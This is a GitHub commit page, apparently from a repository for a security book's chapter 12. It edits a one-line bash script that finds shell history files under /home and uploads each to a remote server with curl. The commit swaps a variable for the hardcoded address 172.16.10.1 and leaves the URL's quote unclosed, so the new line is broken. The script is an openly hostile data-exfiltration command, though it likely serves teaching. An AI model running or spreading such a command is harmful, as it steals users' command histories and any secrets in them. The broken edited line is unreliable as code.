Skip to content

Commit

Permalink
hardcode ip
Browse files Browse the repository at this point in the history
  • Loading branch information
dolevf committed Dec 1, 2023
1 parent 67cb65c commit ffe3cd9
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion ch12/raw_code.txt
Original file line number Diff line number Diff line change
@@ -1,2 +1,2 @@
#!/bin/bash
find /home/ -type f -name ".*_history" -exec curl -F "filedata=@{}" "http://${REMOTE_SERVER}" \;
find /home/ -type f -name ".*_history" -exec curl -F "filedata=@{}" "http://172.16.10.1 \;

0 comments on commit ffe3cd9

Please sign in to comment.